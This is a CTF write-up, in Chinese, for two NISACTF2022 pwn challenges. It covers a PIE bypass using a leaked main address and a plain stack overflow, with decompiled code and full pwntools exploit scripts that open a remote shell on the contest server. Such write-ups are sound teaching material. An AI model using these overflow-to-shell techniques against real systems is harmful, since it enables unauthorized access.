pwn - write ups

[NISACTF2022]ezpie

• checksec

    Arch:     i386-32-little     RELRO:    Partial RELRO     Stack:    No canary found     NX:       NX enabled     PIE:      PIE enabled 

OHHH!,give you a gift! 0x56573770 Input: 

• main

int __cdecl main(int argc, const char **argv, const char **envp) {   setbuf(stdin, 0);   setbuf(stdout, 0);   puts(OHHH!,give you a gift!);   printf(%p\n, main);   puts(Input:);   vuln();   return 0; } 

• vuln

ssize_t vuln() {   char buf; // [esp+0h] [ebp-28h]    return read(0, &buf, 0x50u); } 

vuln()有溢出

已知程序会输出main地址

程序main函数地址为00000770，则

main_addr = int(io.recvline(),16) offset = main_addr - main_add 

接收程序输出的main函数地址，减去静态地址算出offset

• shell

int shell() {   return system(/bin/sh); } 

获取shell地址

bin_sh = elf.sym['shell'] 

加上offset，得bin_sh_final

bin_sh_final = offset + bin_sh 

完整exp

from pwn import * context(os = 'linux' , arch = 'i386' , log_level = 'debug') content = 0 if content == 0:     io = remote('124.221.24.137',28638) else:     io = process('') def atk():     elf = ELF('')     padlength = 0x28 +0x4     bin_sh = elf.sym['shell']     io.recvuntil('OHHH!,give you a gift!\n')     main_addr = int(io.recvline(),16)     success('[+]main_addr=' + hex(main_addr))     main_add = elf.sym['main']     offset = main_addr - main_add     success('[+]offset=' + hex(offset))     io.recvuntil('Input:\n')     success('[+]bin_sh=' + hex(bin_sh))     bin_sh_final = offset + bin_sh     success('[+]bin_sh_final='+hex(bin_sh_final))     payload = b'a' * padlength + p64(bin_sh_final)     io.sendline(payload)     io.interactive() 

[NISACTF2022]ezstack

• main

int __cdecl main(int argc, const char **argv, const char **envp) {   setbuf(stdin, 0);   setbuf(stdout, 0);   shell();   return 0; } 

• shell

ssize_t shell() {   char buf; // [esp+0h] [ebp-48h]    system(echo Welcome to NISACTF);   return read(0, &buf, 0x60u); } 

shell函数处有溢出

完整exp

from pwn import * elf = ELF('') # io = process('') io = remote('124.221.24.137',28760) padlength = 0x48 + 0x4 bin_sh = next(elf.search(b'/bin/sh')) system = elf.sym['system'] success('[+]bin_sh=' + hex(bin_sh))  success('[+]system=' + hex(system)) shell = elf.sym['shell'] success('[+]shell=' + hex(shell)) payload = b'a' * padlength + p32(system) + p32(bin_sh) io.sendline(payload) io.interactive()